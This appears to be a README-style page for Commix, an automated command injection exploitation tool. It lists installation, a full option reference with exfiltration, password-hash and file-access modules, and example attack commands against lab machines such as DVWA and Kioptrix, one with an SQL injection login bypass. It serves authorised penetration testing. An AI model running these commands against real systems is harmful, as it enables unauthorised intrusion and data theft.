Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool that you can use to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks.
By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.
Requirements
- Python 2.6.x or 2.7.x
- Linux/ Mac OS X/ Windows (experimental)
Installation
Download commix by cloning the Git repository:
git clone https://github.com/commixproject/commix.git commix
Commix comes packaged on the official repositories of the following Linux distributions so you can use the package manager to install it!
- ArchStrike
- BlackArch Linux
- BackBox
- Kali Linux
- Parrot Security OS
- Weakerthan Linux
Commix also comes as a plugin, on the following penetration testing frameworks:
- TrustedSec’s Penetration Testers Framework (PTF)
- OWASP Offensive Web Testing Framework (OWTF)
- CTF-Tools
- PentestBox
- PenBox
- Katoolin
- Aptive’s Penetration Testing tools
- Homebrew Tap – Pen Test Tools
Usage:
python commix.py [option(s)] Options: -h, --help Show help and exit. General: These options relate to general matters. -v VERBOSE Verbosity level (0-4, Default: 0). --install Install 'commix' to your system. --version Show version number and exit. --update Check for updates (apply if any) and exit. --output-dir=OUT.. Set custom output directory path. -s SESSION_FILE Load session from a stored (.sqlite) file. --flush-session Flush session files for current target. --ignore-session Ignore results stored in session file. -t TRAFFIC_FILE Log all HTTP traffic into a textual file. --batch Never ask for user input, use the default behaviour. --charset=CHARSET Force character encoding used for data retrieval. --check-internet Check internet connection before assessing the target. Target: This options has to be provided, to define the target URL. -u URL, --url=URL Target URL. --url-reload Reload target URL after command execution. -l LOGFILE Parse target from HTTP proxy log file. -m BULKFILE Scan multiple targets given in a textual file. -r REQUESTFILE Load HTTP request from a file. --crawl=CRAWLDEPTH Crawl the website starting from the target URL (1-2, Default: 0). -x SITEMAP_URL Parse target(s) from remote sitemap(.xml) file. Request: These options can be used to specify how to connect to the target URL. -d DATA, --data=.. Data string to be sent through POST. --host=HOST HTTP Host header. --referer=REFERER HTTP Referer header. --user-agent=AGENT HTTP User-Agent header. --random-agent Use a randomly selected HTTP User-Agent header. --param-del=PDEL Set character for splitting parameter values. --cookie=COOKIE HTTP Cookie header. --cookie-del=CDEL Set character for splitting cookie values. -H HEADER, --hea.. Extra header (e.g. 'X-Forwarded-For: 127.0.0.1'). --headers=HEADERS Extra headers (e.g. 'Accept-Language: frnETag: 123'). --proxy=PROXY Use a HTTP proxy (e.g. '127.0.0.1:8080'). --tor Use the Tor network. --tor-port=TOR_P.. Set Tor proxy port (Default: 8118). --tor-check Check to see if Tor is used properly. --auth-url=AUTH_.. Login panel URL. --auth-data=AUTH.. Login parameters and data. --auth-type=AUTH.. HTTP authentication type (e.g. 'Basic' or 'Digest'). --auth-cred=AUTH.. HTTP authentication credentials (e.g. 'admin:admin'). --ignore-401 Ignore HTTP error 401 (Unauthorized). --force-ssl Force usage of SSL/HTTPS. --ignore-redirects Ignore redirection attempts. --retries=RETRIES Retries when the connection timeouts (Default: 3). Enumeration: These options can be used to enumerate the target host. --all Retrieve everything. --current-user Retrieve current user name. --hostname Retrieve current hostname. --is-root Check if the current user have root privileges. --is-admin Check if the current user have admin privileges. --sys-info Retrieve system information. --users Retrieve system users. --passwords Retrieve system users password hashes. --privileges Retrieve system users privileges. --ps-version Retrieve PowerShell's version number. File access: These options can be used to access files on the target host. --file-read=FILE.. Read a file from the target host. --file-write=FIL.. Write to a file on the target host. --file-upload=FI.. Upload a file on the target host. --file-dest=FILE.. Host's absolute filepath to write and/or upload to. Modules: These options can be used increase the detection and/or injection capabilities. --icmp-exfil=IP_.. The 'ICMP exfiltration' injection module. (e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3'). --dns-server=DNS.. The 'DNS exfiltration' injection module. (Domain name used for DNS exfiltration attack). --shellshock The 'shellshock' injection module. Injection: These options can be used to specify which parameters to inject and to provide custom injection payloads. -p TEST_PARAMETER Testable parameter(s). --skip=SKIP_PARA.. Skip testing for given parameter(s). --suffix=SUFFIX Injection payload suffix string. --prefix=PREFIX Injection payload prefix string. --technique=TECH Specify injection technique(s) to use. --skip-technique.. Specify injection technique(s) to skip. --maxlen=MAXLEN Set the max length of output for time-related injection techniques (Default: 10000 chars). --delay=DELAY Seconds to delay between each HTTP request. --time-sec=TIMESEC Seconds to delay the OS response (Default 1). --tmp-path=TMP_P.. Set the absolute path of web server's temp directory. --web-root=WEB_R.. Set the web server document root directory (e.g. '/var/www'). --alter-shell=AL.. Use an alternative os-shell (e.g. 'Python'). --os-cmd=OS_CMD Execute a single operating system command. --os=OS Force back-end operating system (e.g. 'Windows' or 'Unix'). --tamper=TAMPER Use given script(s) for tampering injection data. --msf-path=MSF_P.. Set a local path where metasploit is installed. --backticks Use backticks instead of "$()", for commands substitution. Detection: These options can be used to customize the detection phase. --level=LEVEL Level of tests to perform (1-3, Default: 1). --skip-calc Skip the mathematic calculation during the detection phase. --skip-empty Skip testing the parameter(s) with empty value(s). --failed-tries=F.. Set a number of failed injection tries, in file-based technique. Miscellaneous: --dependencies Check for third-party (non-core) dependencies. --purge-output Safely remove all content from output directory. --skip-waf Skip heuristic detection of WAF/IPS/IDS protection. --mobile Imitate smartphone through HTTP User-Agent header. --offline Work in offline mode. --wizard Simple wizard interface for beginner users. --disable-coloring Disable console output coloring.
Examples:
- Exploiting Damn Vulnerable Web App:
root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/ vulnerabilities/exec/#" --data="ip=127.0.0.1&submit=submit" --cookie="security =medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"
- Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/ wizard/index.php?type=test" --prefix="'" --suffix="//"
- Exploiting OWASP Mutillidae using extra headers and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/ index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host= 127.0.0.1" --headers="Accept-Language:frnETag:123n" --proxy="127.0.0.1:8081"
- Exploiting Persistence using ICMP exfiltration technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"
- Exploiting Persistence using an alternative (python) shell:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"
- Exploiting Kioptrix: Level 1.1 (#2):
root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/ index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"
- Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/ drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"
- Exploiting CVE-2014-6271/Shellshock:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock
- Exploiting commix-testbed (cookie) using cookie-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/ scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"
- Exploiting commix-testbed (user-agent) using ua-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/ scenarios/user-agent/ua(blind).php" --level=3
- Exploiting commix-testbed (referer) using referer-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/ scenarios/referer/referer(classic).php" --level=3
- Exploiting Flick 2 using custom headers and base64 encoding option:
root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commixnX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64
- Exploiting commix-testbed (JSON-based) using JSON POST data:
root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/
scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'
- Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"
